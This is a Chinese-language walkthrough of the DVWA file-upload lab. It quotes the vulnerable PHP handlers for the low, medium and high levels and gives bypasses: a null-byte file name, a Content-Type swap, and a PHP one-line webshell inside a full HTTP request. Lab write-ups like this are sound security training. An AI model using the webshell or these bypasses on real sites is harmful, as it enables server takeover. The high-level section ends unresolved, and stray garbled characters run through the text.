low:
- <?php
-
- if( isset( $_POST[ 'Upload' ] ) ) {
-
- $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
- $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
-
-
- if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
-
- echo '<pre>Your image was not uploaded.</pre>';
- }
- else {
-
- echo "<pre>{$target_path} succesfully uploaded!</pre>";
- }
- }
-
- ?>
沒有對文件類型進行限制�,直接將php文件上傳�,之后訪問:http://localhost/hackable/uploads/XX.php即可。
medium:
- <?php
-
- if( isset( $_POST[ 'Upload' ] ) ) {
-
- $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
- $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
-
-
- $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
- $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
- $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
-
-
- if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
- ( $uploaded_size < 100000 ) ) {
-
-
- if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
-
- echo '<pre>Your image was not uploaded.</pre>';
- }
- else {
-
- echo "<pre>{$target_path} succesfully uploaded!</pre>";
- }
- }
- else {
-
- echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
- }
- }
-
- ?>
對上傳的文件進行限制。
解決方法1:用burp suite進行00截斷,將文件名改為1.php .jpg(注意中間有空格)然后在攔截中將空格改為00��。
解決方法2:直接上傳2.php文件之后進行攔截����,數據包如下:
- POST /vulnerabilities/upload/ HTTP/1.1
- Host: localhost
- User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Referer: http:
- Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
- Connection: keep-alive
- Content-Type: multipart/form-data; boundary=---------------------------143381619322555
- Content-Length: 549
-
- -----------------------------143381619322555
- Content-Disposition: form-data; name="MAX_FILE_SIZE"
-
- 100000
- -----------------------------143381619322555
- Content-Disposition: form-data; name="uploaded"; filename="2.php"
- Content-Type: application/octet-stream
-
- <?php
-
- $item['wind'] = 'assert';
-
- $array[] = $item;
-
- $array[0]['wind']($_POST['loveautumn']);
-
- ?>
- -----------------------------143381619322555
- Content-Disposition: form-data; name="Upload"
-
- Upload
- -----------------------------143381619322555--
將紅色的部分修改成:Content-Type: image/jpeg即可繞過。
High:
- <?php
-
- if( isset( $_POST[ 'Upload' ] ) ) {
-
- $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
- $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
-
-
- $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
- $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
- $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
- $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
-
-
- if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
- ( $uploaded_size < 100000 ) &&
- getimagesize( $uploaded_tmp ) ) {
-
-
- if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
-
- echo '<pre>Your image was not uploaded.</pre>';
- }
- else {
-
- echo "<pre>{$target_path} succesfully uploaded!</pre>";
- }
- }
- else {
-
- echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
- }
- }
-
- ?>
對圖片的命名和類型進行了嚴格的限制,那么可以用文件頭欺騙的方式來解決這個問題。另外�,假設文件名為1.php.png�����,strrpos會截取.出現的最后位置是5��,之后substr從第六位開始重新命名文件名,也就是最終上傳的文件名會被改成png�,會被攔截掉�。
首先使用記事本對正常圖片文件編輯�,將php一句話代碼寫到圖片最下面,保存�。這樣就可以欺騙文件類型的檢測。
最后對文件名的重命名進行繞過���。將文件名改為1.php .png上傳,用burpsuite攔截:
Content-Disposition: form-data; name="uploaded"; filename="1.php .png"部分修改為:
Content-Disposition: form-data; name="uploaded"; filename="1.php/X00.php .png"的話可以獲得一個x00.php .png文件�,這個是之前有php任意文件上傳漏洞的文章中提到過的���。對空格截斷無效����。目前不知道最終答案��,可能是上傳一個含有一句話的jpg文件之后采用文件包含來完成���?暫時存疑
